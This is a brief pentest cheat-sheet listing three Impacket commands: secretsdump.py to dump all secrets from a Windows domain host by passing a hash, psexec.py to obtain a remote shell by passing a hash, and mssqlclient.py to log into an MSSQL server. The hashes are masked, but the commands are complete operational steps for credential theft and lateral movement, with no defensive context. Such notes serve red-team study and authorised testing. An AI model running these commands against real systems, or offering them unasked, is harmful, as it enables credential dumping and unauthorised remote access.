// Dump all secrets passing the Hash

secretsdump.py 'domain/user@domain-ip' -hashes '************************************'  

// Get a shell on the remote machine passing the hash
psexec.py 'domain/user@domain-ip' -hashes '************************************'  

// MSSQL client
mssqlclient.py user:password@ip